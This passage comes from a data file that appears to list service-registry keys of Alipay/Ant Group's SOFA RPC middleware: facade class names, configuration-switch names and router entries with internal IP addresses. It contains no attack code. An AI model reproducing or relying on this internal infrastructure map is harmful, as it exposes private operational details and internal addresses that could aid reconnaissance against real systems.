.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcOrgPositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.materials.MaterialsSyncWriteBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.document.BackDocManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcResourceTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.exratecenter.service.facade.api.ExClientRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.trsbrain.common.service.facade.service.EmergencyPlanFacade:1.0:whitePaperEmergencyPlanProvider@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundselling.common.service.productx.facade.ProductXDailyInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingInstContactQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.businesstype.api.BusinessTypeMapQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:datafin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.core.service.playback.PlaybackMockRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BIZFUNDPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.biz.risk.manager.RiskConfirmManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MYPOINTSPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.PrizeSendQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_CTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.38.65.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:creditmcportal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataCacheRefreshService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.pattern.facade.QuestionPatternQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.dbTableRuleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afts.common.service.facade.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dartkeeper.rm.service.KeeperClientConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tradequery.common.service.facade.TradeBaseQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antmembermng.common.service.dataoperation.component.BizAppSaveDataOperateService:1.0:antmembermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYBATCH_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.qrcode.AppQrCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.RuleQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.CharityQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.ForestUserInfoQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccorder.service.facade.api.query.ProductPropertyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.biz.shared.batch.repository.BusinessStageMetaRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.GreyTemplateConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:reservecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fporgassetcenter.common.service.facade.api.IntegrationTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.common.facade.FppolicygwClientResultListener:1.0:fppolicymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.InstPayDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.choosedschedule.ChoosedScheduleQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.OpenApiManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@serverlessbaseapp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenCommentGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.ZnodeRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcactivitycore.facade.activity.service.ActivityInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_tsd_tsdSceneGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.RegisterInstBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.234.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.MonthlyBillDrm.showYebDepositTipLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icsmng.service.facade.customer.card.HKCustomerCarDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.BriefManagementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.gildata.GdLcNottextannouncementSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.api.VerifyService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.34.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.fpFeatures,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_Q_DOOM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insdataprod.common.service.facade.diff.api.PrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.uic.common.service.membership.biz.MembershipActivityBizReadService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.SignSchemeOrderOperateFacade:1.0:bksigncentre_signSchemeOrderOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IVR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbpdcenter.common.service.facade.ProdSwitchQuery4ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nevermore.common.service.facade.api.SystemLogSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mdeduct.common.serivce.query.UsageAgreementQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.stockassetcore.common.service.facade.api.StockRemindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.HKCampService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.fortest.FininfluxEventHandlerTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LPRConfigDrm.lprConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscvprod.common.service.facade.InsImageRecognizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.common.service.facade.api.RelationalRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiSyncManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.PcreditInstPromoRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchishub.common.service.facade.api.v2.OneStopConfigFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tss.supportprod.facade.opsbatch.facade.OpsBatchFusingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.InstL2AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APSETTLEMENT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.shared.schedule.mainsubtask.MainSubTaskExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:${paycore_schedule_loader}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autobizcore.common.fundamental.datafacade.KeywordModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.ProfileViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:algoevaluator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArCollectRefundOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.feature.FeatureAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtDbkProdWithStyCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_feSettleProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.VerifyProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.yigou.api.YigouFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.wfinUserCountWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.PropertyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:kbsrecenter_processmngProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:qconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.group.GroupIdentityService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.bluesky.BlueSkyLeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idmp.web.home.test.rpc.HelloService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.grade.MemberActiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.PriceApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.161.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clive.common.service.facade.api.MessageQueryService:1.0.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmscore.common.service.facade.PmscoreConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","seekers@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.component.service.ProcessDispatcher:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koittestg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.user.UserRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocktrade.facade.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.DeductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:tradeGeneralPaycheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.label.api.AnnaCustomLabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.datacloudDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialEnforceWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkbillweb.facade.BkBillWebService:1.0:BkBillWebService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundAppointmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.LicenseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paydecision:name=com.alipay.paydecision.service.client.trigger.PaydecisionTimelinessResource.twoHNeedModifyTimeAbilityInstIds,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.UctTaskShardingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:autoAccessProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.UserActivityControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PasswordSecureInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_orderResultGatherAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.48.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintranscore.common.service.facade.trans.FinTransRepayQueryFacade:1.0:bkftranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:poseShopUpdateRiskAuditCallbackExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rockfuzz.common.service.facade.FuzzFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.biz.shared.partner.repository.PartnerProfileRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.ServiceSingleSolutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.ins.InsuranceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.leads.SaleLeadsSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_KBSECURITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quotstore.common.internal.facade.api.InternalQuoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcStatisticResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2DealTransactionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_portrait_PartnerMerchantRelationService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.api.MerchantCrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.core.service.cif.UserProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.DmsExecutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.OdEnumOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.spi.KoaOrderPushProcessCallback:1.0:koa-box@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:hookApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.FundInvestWorkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_PAYMENT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.testmeshend.facade.ServiceOfControlMode:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcb:name=com.alipay.fundselling.common.drm.MigrateSwitchDrm.openAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.166.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.211.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mychain.baas.account.endpoint.facade.AccountMappingRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:fundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.ciecore.common.service.facade.VariableCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ialicore.irouteclient.elastic.api.ElasticService:1.0:false@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.demo.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.trsbrain.common.service.facade.service.PlanPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_submit2ReviewProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.eventRetryEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PROMORULECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:appUpgradeTask_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.core.RuleAnalyzeService:1.0:NEWVELOCITY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.common.service.facade.api.manage.ParamSubscribeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_solutionVersionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmdm.common.service.facade.api.MetaDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.topicspeech.api.TopicSpeechFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.starstage.facade.StarstageBusinessDomainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.OperateLogFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cdp.common.service.facade.space.api.CdpFatigueManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antscheduler.facade.IJobTriggerInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.131.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.v2.cluster.facade.SentenceSourceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.SofitoSeasonVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minicenter.common.service.facade.api.inner.MiniVersionQueryInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.ropcn.common.service.facade.api.analyze.RopAnalyzeService:1.0:rop-analyze-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecashier.service.facade.PayOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcs_test.uniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.core.IdentityTagQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@charityprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mitemcenter.common.service.facade.backend.api.ItemCacheRemoveInCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.importrecord.facade.ImportRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_I